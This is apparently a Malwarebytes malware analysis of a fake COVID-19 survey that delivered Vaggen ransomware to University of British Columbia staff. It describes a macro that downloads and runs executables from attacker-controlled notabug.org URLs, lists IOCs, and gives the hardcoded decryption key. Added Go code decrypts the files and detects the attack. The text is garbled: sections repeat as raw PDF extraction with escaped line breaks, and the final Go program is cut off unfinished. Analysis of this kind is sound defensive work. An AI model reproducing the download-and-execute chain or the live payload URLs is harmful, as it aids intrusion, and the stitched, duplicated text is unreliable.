The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the shell function to execute killar.exe
Checks the output of the shell function to see whether it was successful (the return value would be the task ID of the executed application)
If successful, it sends a GET HTTP request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, it sends a GET HTTP request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event. This can be very useful as an early warning system that an intruder has had access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here, using a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.

The output file (with the .VAGGEN extension) contains:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs
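The file layout described in the Vaggen ransomware section (12-byte nonce, then the AES-256-GCM ciphertext, then the 16-byte tag, all under the hardcoded key) is what makes recovery without payment possible. The following Go program is an added example, not code from the original post or from the malware: it parses that layout and decrypts it with the stdlib crypto/cipher package, rejecting short, tampered or wrong-key inputs; the fixture builder, the zero nonce and the sample document are constructed here for offline testing.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

// Hardcoded key reported in the analysis: 32 bytes, which selects AES-256.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	vaggenNonceSize = 12 // nonce prepended to the output file
	vaggenTagSize   = 16 // GCM tag appended by gcm.Seal
)

// newVaggenGCM builds the AEAD shared by both helpers. The explicit length
// check matters: aes.NewCipher would silently pick AES-128 for a 16-byte key.
func newVaggenGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("key is %d bytes, want 32 for AES-256", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // default 12-byte nonce and 16-byte tag
}

// decryptVaggen reverses the on-disk layout nonce || ciphertext || tag.
// Go's gcm.Open consumes ciphertext||tag as one slice, so only the nonce
// is split off explicitly.
func decryptVaggen(key, blob []byte) ([]byte, error) {
	if len(blob) < vaggenNonceSize+vaggenTagSize {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	gcm, err := newVaggenGCM(key)
	if err != nil {
		return nil, err
	}
	nonce, ctAndTag := blob[:vaggenNonceSize], blob[vaggenNonceSize:]
	pt, err := gcm.Open(nil, nonce, ctAndTag, nil)
	if err != nil {
		// Tag mismatch: wrong key, truncated or tampered file. No output is produced.
		return nil, fmt.Errorf("GCM authentication failed (wrong key or damaged file): %w", err)
	}
	return pt, nil
}

// buildVaggenFixture writes a constructed test file in the same layout so the
// decryptor can be exercised offline. The caller supplies a fixed nonce for
// reproducibility; the real sample draws its nonce from CryptGenRandom.
func buildVaggenFixture(key, plaintext []byte, nonce [vaggenNonceSize]byte) ([]byte, error) {
	gcm, err := newVaggenGCM(key)
	if err != nil {
		return nil, err
	}
	// Passing the nonce as dst makes Seal append ciphertext||tag after it,
	// which yields exactly the nonce || ciphertext || tag layout observed.
	return gcm.Seal(nonce[:], nonce[:], plaintext, nil), nil
}

func main() {
	key := []byte(vaggenKey)
	var nonce [vaggenNonceSize]byte // all-zero nonce: constructed fixture only
	doc := []byte("constructed sample document contents")

	blob, err := buildVaggenFixture(key, doc, nonce)
	if err != nil {
		panic(err)
	}
	fmt.Printf("fixture: %d bytes = %d nonce + %d ciphertext + %d tag\n",
		len(blob), vaggenNonceSize, len(doc), vaggenTagSize)

	pt, err := decryptVaggen(key, blob)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered: %q\n", pt)

	blob[len(blob)-1] ^= 0x01 // flip one bit of the tag
	if _, err := decryptVaggen(key, blob); err != nil {
		fmt.Println("tampered file rejected:", err)
	}
}
```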
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 645 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 646 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 647 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 648 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 649 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 650 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 651 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 652 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 653 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 654 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 655 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 656 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 657 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 658 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 659 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 660 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 661 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 662 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 663 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we've observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful thanks to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without creating a number of false positives: the notification comes from the sharing platform's own, well-reputed infrastructure.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The .docx itself carries no macro: it only holds a relationship pointing at the template, and Word fetches that template, together with any macro it contains, when the document is opened.
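To make the template injection concrete, here is an added example (not code from the Malwarebytes post, and not the attacker's document) that inspects a .docx the way a triage script would: it opens the file as an OPC zip container, reads word/_rels/settings.xml.rels and reports every attachedTemplate relationship whose TargetMode is External, which is exactly the hook a remote .dotm rides in on. The sample document and its template URL (https://example.com/template.dotm) are constructed in memory for the example; the post does not give the real template's path.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// relationships models the part of an OPC .rels file we care about. Word
// records an attached template as a Relationship whose Type ends in
// "/attachedTemplate"; when TargetMode="External" the Target is a URL (or
// UNC path) that Word fetches when the document is opened.
type relationships struct {
	Rels []struct {
		ID         string `xml:"Id,attr"`
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// findRemoteTemplates treats docx as a zip container, reads
// word/_rels/settings.xml.rels and returns every external attachedTemplate
// target. An empty result means the document does not pull a remote template.
func findRemoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not an OPC/zip container: %w", err)
	}
	var hits []string
	for _, f := range zr.File {
		if f.Name != "word/_rels/settings.xml.rels" {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("bad settings.xml.rels: %w", err)
		}
		for _, r := range rels.Rels {
			if strings.HasSuffix(r.Type, "/attachedTemplate") && r.TargetMode == "External" {
				hits = append(hits, r.Target)
			}
		}
	}
	return hits, nil
}

// buildSampleDocx writes a minimal, constructed .docx-shaped zip in memory.
// If templateURL is empty the document carries no settings relationships
// (the benign case); otherwise it points its attached template at the URL.
func buildSampleDocx(templateURL string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	add := func(name, body string) {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		if _, err := w.Write([]byte(body)); err != nil {
			panic(err)
		}
	}
	add("[Content_Types].xml", `<?xml version="1.0" encoding="UTF-8"?>`+
		`<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>`)
	add("word/document.xml", `<?xml version="1.0" encoding="UTF-8"?>`+
		`<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>`)
	if templateURL != "" {
		add("word/_rels/settings.xml.rels", `<?xml version="1.0" encoding="UTF-8"?>`+
			`<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">`+
			`<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" `+
			`Target="`+templateURL+`" TargetMode="External"/></Relationships>`)
	}
	if err := zw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	// Placeholder URL: the post does not give the template's exact path.
	doc := buildSampleDocx("https://example.com/template.dotm")
	hits, err := findRemoteTemplates(doc)
	if err != nil {
		panic(err)
	}
	for _, h := range hits {
		fmt.Println("remote template:", h)
	}
}
```

A hit is a triage signal, not a verdict: organisations that run a template server produce the same relationship legitimately, so the target host is what to look at, and a file:// or UNC target deserves attention in its own right because Word will authenticate to it. On a real file, replace the constructed bytes with the contents of the .docx read from disk.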
That remote template (template.dotm) was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

- Gets the %APPDATA% directory
- Creates the Byxor directory in %APPDATA%
- Downloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
- Downloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
- Calls the Shell function to execute Killar.exe
- Checks the return value of Shell to see whether the launch succeeded (on success, the return value is the task ID of the executed application)
- If successful, sends an HTTP GET request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
- If not successful, sends an HTTP GET request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to be alerted when a particular event occurs, which makes it a useful early warning system that an intruder has gained access to a network.
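Every step in the macro above leaves a host-telemetry trace: the template fetch, the two payload downloads and the canary GET are all HTTP requests made from inside the Word process, and the Shell call makes WINWORD.EXE the parent of an executable sitting under %APPDATA%. The following added example (this is not code from the Malwarebytes post or a vendor's rule set) encodes those two behaviours as detection logic and runs it over a few constructed Sysmon-style records; the JSON field names are this example's own, and the records are made up for the demonstration, not real logs.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"strings"
)

// event is the handful of fields a Sysmon-style process-creation or network
// record carries. Field names are this example's own, not a vendor schema.
type event struct {
	Kind        string `json:"kind"`         // "process" or "network"
	ParentImage string `json:"parent_image"` // process events only
	Image       string `json:"image"`        // new process, or the process that connected
	DestHost    string `json:"dest_host"`    // network events only
}

// Domains the template fetch and the macro talk to, per the analysis above.
var watchedDomains = []string{"notabug.org", "canarytokens.com"}

func baseName(path string) string {
	return strings.ToLower(path[strings.LastIndexAny(path, `\/`)+1:])
}

func isWord(image string) bool { return baseName(image) == "winword.exe" }

func underWatchedDomain(host string) bool {
	h := strings.ToLower(host)
	for _, d := range watchedDomains {
		if h == d || strings.HasSuffix(h, "."+d) {
			return true
		}
	}
	return false
}

// flagEvent returns an alert for the two behaviours the macro shows: Word
// spawning an executable it just wrote under %APPDATA%, and Word itself
// talking to the hosting or canary domains.
func flagEvent(e event) (string, bool) {
	switch e.Kind {
	case "process":
		img := strings.ToLower(e.Image)
		if isWord(e.ParentImage) && strings.Contains(img, `\appdata\roaming\`) && strings.HasSuffix(img, ".exe") {
			return "winword.exe launched an executable from %APPDATA%: " + e.Image, true
		}
	case "network":
		if isWord(e.Image) && underWatchedDomain(e.DestHost) {
			return "winword.exe connected to " + e.DestHost, true
		}
	}
	return "", false
}

// scan runs flagEvent over newline-delimited JSON records and returns alerts.
func scan(ndjson string) ([]string, error) {
	var alerts []string
	sc := bufio.NewScanner(strings.NewReader(ndjson))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		var e event
		if err := json.Unmarshal([]byte(line), &e); err != nil {
			return nil, fmt.Errorf("bad record %q: %w", line, err)
		}
		if msg, hit := flagEvent(e); hit {
			alerts = append(alerts, msg)
		}
	}
	return alerts, sc.Err()
}

// Constructed sample telemetry mirroring the macro's steps; not real logs.
// Records 1 to 3 should alert; the last two are benign look-alikes.
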